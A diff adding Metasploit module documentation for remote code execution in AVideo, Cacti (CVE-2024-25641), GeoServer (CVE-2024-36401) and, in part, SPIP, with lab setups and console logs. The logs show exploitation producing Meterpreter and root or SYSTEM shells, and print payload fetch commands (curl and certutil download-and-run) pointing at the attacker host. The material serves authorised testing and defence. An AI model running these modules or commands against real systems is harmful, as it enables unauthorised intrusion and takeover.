+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/avideo_wwbnindex_unauth_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'
+
+msf6 > use 3
+[*] Additionally setting TARGET => Unix In-Memory
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > options
+
+Module options (exploit/multi/http/avideo_wwbnindex_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      nhjkrZakk        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set rhosts 192.168.100.20
+rhosts => 192.168.100.20
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lhost eth0
+lhost => 192.168.100.10
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lport 1337
+lport => 1337
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set fetch_srvport 5000
+fetch_srvport => 5000
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (3045380 bytes) to 192.168.100.20
+[*] Meterpreter session 1 opened (192.168.100.10:1337 -> 192.168.100.20:52936) at 2024-04-04 23:08:05 +0200
+
+meterpreter > sysinfo
+Computer     : 192.168.100.20
+OS           : Ubuntu 20.04 (Linux 5.4.0-169-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down session: 1
+
+[*] 192.168.100.20 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > use 2
+[*] Additionally setting TARGET => PHP In-Memory
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (39927 bytes) to 192.168.100.20
+[*] Meterpreter session 2 opened (192.168.100.10:1337 -> 192.168.100.20:36258) at 2024-04-04 23:08:44 +0200
+
+meterpreter > getuid
+Server username: www-data
+```
@@ -0,0 +1,284 @@
+## Vulnerable Application
+
+This exploit module leverages an arbitrary file write vulnerability
+(CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It abuses
+the `Import Packages` feature to upload a specially crafted package that embeds
+a PHP file. Cacti will extract this file to an accessible location. The module
+finally triggers the payload to execute arbitrary PHP code in the context of
+the user running the web server.
+
+Authentication is needed and the account must have access to the `Import
+Packages` feature. This is granted by setting the `Import Templates` permission
+in the `Template Editor` section.
+
+
+## Installation
+
+### Docker installation of Cacti version 1.2.26
+- Create the following files (based on the files from [here](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169)):
+  - `docker-compose.yml`:
+```
+version: '2'
+services:
+  web:
+    build: ./cacti
+    ports:
+     - "8080:80"
+    depends_on:
+     - db
+    entrypoint:
+     - bash
+     - /entrypoint.sh
+    volumes:
+     - ./entrypoint.sh:/entrypoint.sh
+    command: apache2-foreground
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cacti
+```
+  - `entrypoint.sh`:
+```
+#!/bin/bash
+set -ex
+
+wait-for-it db:3306 -t 300 -- echo "database is connected"
+if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
+    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti/cacti.sql
+    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
+    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
+fi
+
+chown www-data:www-data -R /var/www/html
+# first arg is `-f` or `--some-option`
+if [ "${1#-}" != "$1" ]; then
+  set -- apache2-foreground "$@"
+fi
+
+exec "$@"
+```
+- Create a `./cacti/` directory with `mkdir cacti`
+- Add the following files in the `./cacti/` folder (based on the files from
+  [here](https://github.com/vulhub/vulhub/tree/master/base/cacti/1.2.22):
+  - `Dockerfile`:
+```
+FROM php:7.4-apache
+
+RUN apt-get update && \
+    apt-get install -y --no-install-recommends rrdtool snmp wget ca-certificates libsnmp-dev default-mysql-client \
+            wait-for-it libjpeg62-turbo-dev libpng-dev libfreetype6-dev libgmp-dev libldap2-dev libicu-dev
+
+RUN docker-php-ext-configure gd --with-freetype --with-jpeg &&\
+    docker-php-ext-configure intl &&\
+    docker-php-ext-configure pcntl --enable-pcntl &&\
+    docker-php-ext-install pdo_mysql snmp gmp ldap sockets gd intl pcntl gettext
+
+RUN mkdir /var/www/html/cacti &&\
+    wget -qO- https://files.cacti.net/cacti/linux/cacti-1.2.26.tar.gz | tar zx -C /var/www/html/cacti --strip-components 1
+
+COPY config.php /var/www/html/cacti/include/config.php
+COPY cacti.ini /usr/local/etc/php/conf.d/cacti.ini
+```
+  - `cacti.ini`
+```
+display_errors=off
+memory_limit=512M
+date.timezone=UTC
+max_execution_time=120
+```
+  - `config.php`
+```
+<?php
+$database_type     = 'mysql';
+$database_default  = 'cacti';
+$database_hostname = 'db';
+$database_username = 'root';
+$database_password = 'root';
+$database_port     = '3306';
+$database_retries  = 5;
+$database_ssl      = false;
+$database_ssl_key  = '';
+$database_ssl_cert = '';
+$database_ssl_ca   = '';
+$database_persist  = false;
+$poller_id = 1;
+$url_path = '/cacti/';
+$cacti_session_name = 'Cacti';
+$cacti_db_session = false;
+$disable_log_rotation = false;
+```
+- Run `docker-compose up`
+- Access http://127.0.0.1:8080
+- Login with the `admin` user (password: `admin`)
+- Follow the installation steps (accept every default settings and ignore the pre-installation checks suggestions)
+
+Note that other versions can be installed this way by changing the `tar` file name in `Dockerfile` (`cacti-1.2.26.tar.gz`).
+
+
+### Cacti on Windows
+Download and run a Cacti installer from
+[here](https://files.cacti.net/cacti/windows/Archive/). The `admin` password
+should be put in a file called `Cacti-Passwords.txt` by the installer, which is
+in the same location the installer was run.
+Follow the same installation steps as for the Docker installation.
+
+
+### Setup a new user
+- Login with the `admin` user (password: `admin`)
+- Go to `Configuration` > `Users`
+- Click on the `+` sign
+- Enter the `User Name`, `Password` and check the `Enabled` option.
+- Click `Create`
+- Go to the `Permissions` tab and set the `Import Templates` permission in `Template Editor`
+- Click `Save`
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use multi/http/cacti_package_import_rce`
+1. Do: `set target <target>`
+1. Do: `run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>`
+1. You should get a shell.
+
+## Options
+
+### USERNAME
+The user to login with (default `admin`).
+
+### PASSWORD
+The password to login with (default `admin`)
+
+
+## Scenarios
+
+### Cacti version 1.2.26 on Docker installation
+- Target 0 (PHP)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=127.0.0.1 rport=8080 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Sending stage (39927 bytes) to 192.168.101.1
+[+] Deleted /var/www/html/cacti/resource/jGbP1O.php
+[*] Meterpreter session 1 opened (192.168.101.1:4444 -> 192.168.101.1:62197) at 2024-05-22 15:28:24 +0200
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 087c6bbb8c7d
+OS          : Linux 087c6bbb8c7d 6.6.22-linuxkit #1 SMP PREEMPT_DYNAMIC Fri Mar 29 12:23:08 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+- Target 1 (Linux Command)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=127.0.0.1 rport=8080 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Command to run on remote host: curl -so ./AynGghlaARy http://192.168.101.1:8080/DETWAARvN-XS_WA2cHnmIg; chmod +x ./AynGghlaARy; ./AynGghlaARy &
+[*] Fetch handler listening on 192.168.101.1:8080
+[*] HTTP server started
+[*] Adding resource /DETWAARvN-XS_WA2cHnmIg
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Client 192.168.101.1 requested /DETWAARvN-XS_WA2cHnmIg
+[*] Sending payload to 192.168.101.1 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.101.1
+[+] Deleted /var/www/html/cacti/resource/R4imZxgqN.php
+[+] Deleted /var/www/html/cacti/resource/AynGghlaARy
+[*] Meterpreter session 3 opened (192.168.101.1:4444 -> 192.168.101.1:62224) at 2024-05-22 15:29:31 +0200
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 172.19.0.3
+OS           : Debian 11.5 (Linux 6.6.22-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Cacti version 1.2.26 on Windows Server 2019
+- Target 0 (PHP)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=192.168.101.124 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Sending stage (39927 bytes) to 192.168.101.124
+[+] Deleted C:/Apache24/htdocs/cacti/resource/WPo04nIf.php
+[*] Meterpreter session 2 opened (192.168.101.1:4444 -> 192.168.101.124:54654) at 2024-05-22 15:28:56 +0200
+
+meterpreter > getuid
+Server username: SYSTEM
+meterpreter > sysinfo
+Computer    : DC02
+OS          : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
+Meterpreter : php/windows
+```
+
+- Target 2 (Windows Command)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=192.168.101.124 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Command to run on remote host: certutil -urlcache -f http://192.168.101.1:8080/Qy-qOX10kZIXJGk3Q336Lg %TEMP%\cpOhjtfIddh.exe & start /B %TEMP%\cpOhjtfIddh.exe
+[*] Fetch handler listening on 192.168.101.1:8080
+[*] HTTP server started
+[*] Adding resource /Qy-qOX10kZIXJGk3Q336Lg
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Client 192.168.101.124 requested /Qy-qOX10kZIXJGk3Q336Lg
+[*] Sending payload to 192.168.101.124 (Microsoft-CryptoAPI/10.0)
+[*] Client 192.168.101.124 requested /Qy-qOX10kZIXJGk3Q336Lg
+[*] Sending payload to 192.168.101.124 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 192.168.101.124
+[+] Deleted C:/Apache24/htdocs/cacti/resource/9PxU2R.php
+[*] Meterpreter session 4 opened (192.168.101.1:4444 -> 192.168.101.124:54669) at 2024-05-22 15:30:20 +0200
+[!] This exploit may require manual cleanup of 'C:/Apache24/htdocs/cacti/resource/cpOhjtfIddh' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC02
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MYLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+```
@@ -0,0 +1,352 @@
+## Vulnerable Application
+
+GeoServer is an open-source software server written in Java that provides the ability to view, edit, and sharegeospatial data.
+It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as
+Geographic Information System (GIS) databases, web-based data, and personal datasets.
+
+In the GeoServer versions prior to `2.23.6`, between version `2.24.0` and `2.24.3` and in version `2.25.0`, `2.25.1`,
+multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input
+against a default GeoServer installation due to unsafely evaluating property names as `XPath` expressions.
+An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the system.
+
+The following GeoServer releases are tested:
+
+**Osgeo.org Docker releases with Tomcat**
+* docker.osgeo.org/geoserver 2.25.0
+* docker.osgeo.org/geoserver 2.24.2
+* docker.osgeo.org/geoserver 2.23.2
+* docker.osgeo.org/geoserver 2.23.0
+* docker.osgeo.org/geoserver 2.21.1
+
+**Vulhub Docker releases with Jetty**
+* vulhub/geoserver 2.23.2
+* vulhub/geoserver 2.22.1
+
+**Linux binary installs with Jetty**
+* geoserver 2.23.5 on x64 Ubuntu 22.04
+* geoserver 2.23.5 on Raspberry PI-4 ARM64 Kali Linux 2024.4
+
+**Windows 10 installer installs with Jetty**
+* geoserver 2.25.0 on x64 Windows 10 (10.0 Build 19045)
+
+## Installation steps to install the GeoServer web application
+* [Installation steps](https://docs.geoserver.org/latest/en/user/installation/win_installer.html) for Windows installer.
+* [Installation steps](https://docs.geoserver.org/latest/en/user/installation/linux.html) for platform-independent Linux binary.
+* [Installation steps](https://docs.geoserver.org/latest/en/user/installation/docker.html) for osgeo.org/geoserver docker images.
+* Use the docker-compose.yaml config file below to pull the vulhub geoserver docker images.
+```yaml
+version: '3'
+services:
+ web:
+   image: vulhub/geoserver:2.23.2
+   ports:
+    - "8080:8080"
+    - "5005:5005"
+```
+*  Pull and install the docker image with `docker compose up -d`
+* You should now be able to access the GeoServer web application via `http://your_ip:8080/geoserver`.
+
+You are ready to test the module.
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/geoserver_unauth_rce_cve_2024_36401`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ]  `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options.
+
+## Scenarios
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > info
+
+       Name: Geoserver unauthenticated Remote Code Execution
+     Module: exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
+   Platform: Unix, Linux
+       Arch: cmd, x86, x64, aarch64, armle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-07-01
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Steve Ikeoka
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix Command
+      1   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
+                                        cs/using-metasploit.html
+  RPORT      8080             yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The URI path of the OpenMediaVault web application
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
+                                       local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  GeoServer is an open-source software server written in Java that provides
+  the ability to view, edit, and share geospatial data.
+  It is designed to be a flexible, efficient solution for distributing geospatial data
+  from a variety of sources such as Geographic Information System (GIS) databases,
+  web-based data, and personal datasets.
+  In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
+  multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
+  through specially crafted input against a default GeoServer installation due to unsafely
+  evaluating property names as XPath expressions.
+  An attacker can abuse this by sending a POST request with a malicious xpath expression
+  to execute arbitrary commands as root on the system.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-36401
+  https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
+  https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
+  https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401
+
+
+View the full module info with the info -d command.
+```
+###  GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set rhosts 192.168.201.86
+rhosts => 192.168.201.86
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target appears to be vulnerable. Version 2.23.5
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux cuckoo 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/usr/share/geoserver
+exit
+```
+###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
+target => 0
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
+rhosts => 192.168.201.10
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target appears to be vulnerable. Version 2.23.5
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-11) aarch64 GNU/Linux
+pwd
+/usr/share/geoserver
+exit
+```
+###  GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
+target => 0
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.42
+rhosts => 192.168.201.10
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target appears to be vulnerable. Version 2.23.2
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux e3f986905bde 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 GNU/Linux
+pwd
+/mnt/geoserver
+```
+###  GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
+target => 1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
+payload => linux/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set srvport 1981
+srvport => 1981
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target appears to be vulnerable. Version 2.23.2
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:1981/FEflDEJ
+[*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
+[*] Sending payload to 192.168.201.42 (curl/7.74.0)
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.42:60353) at 2024-07-11 18:48:02 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.21.0.2
+OS           : Debian 11.3 (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/mnt/geoserver
+meterpreter >
+```
+###  GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
+target => 1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
+payload => linux/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target appears to be vulnerable. Version 2.25.0
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:1981/CEkJIBo
+[*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
+[*] Sending payload to 192.168.201.42 (curl/7.81.0)
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:61350) at 2024-07-11 20:46:14 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 22.04 (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/opt
+meterpreter >
+```
+###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
+target => 1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/aarch64/meterpreter_reverse_tcp
+payload => linux/aarch64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
+rhosts => 192.168.201.10
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target appears to be vulnerable. Version 2.23.5
+[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
+[*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
+[*] Sending payload to 192.168.201.10 (curl/8.5.0)
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Meterpreter session 12 opened (192.168.201.8:4444 -> 192.168.201.10:60692) at 2024-07-11 21:04:34 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/usr/share/geoserver
+meterpreter >
+```
+### GeoServer 2.25.0 on x64 Windows 10 (10.0 Build 19045)
+```
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 2
+target => 2
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target appears to be vulnerable. Version 2.25.0
+[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (201798 bytes) to 172.16.199.131
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700
+
+meterpreter > getuid
+Server username: DESKTOP-N3ORU31\msfuser
+meterpreter > sysinfo
+Computer        : DESKTOP-N3ORU31
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
+## Limitations
+No limitations.
@@ -0,0 +1,165 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
+The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input, allowing an attacker
+to inject and execute arbitrary PHP code.
+This can be achieved by crafting a payload that manipulates the templating data processed by the `echappe_retour()` function,
+which invokes `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.
+
+To replicate a vulnerable environment for testing:
+
+1. Install SPIP using the provided Docker Compose configuration.
+2. Use the image `ipeos/spip:4.2.12` to ensure the environment is vulnerable.
+3. Verify that the SPIP instance is accessible on the local network.
+
+### Docker Setup
+
+Use the following Docker Compose file to set up the environment:
+
+```yaml
+version: '3.8'
+
+services:
+  db:
+    image: mariadb:10.5
+    restart: always
+    environment:
+      - MYSQL_ROOT_PASSWORD=MysqlRootPassword
+      - MYSQL_DATABASE=spip
+      - MYSQL_USER=spip
+      - MYSQL_PASSWORD=spip
+    volumes:
+      - mysql-data:/var/lib/mysql
+
+  app:
+    image: ipeos/spip:4.2.12
+    restart: always
+    depends_on:
+      - db
+    environment:
+      - SPIP_SITE_ADDRESS=http://localhost:8880
+      - SPIP_DB_SERVER=db
+      - SPIP_DB_LOGIN=spip
+      - SPIP_DB_PASS=spip
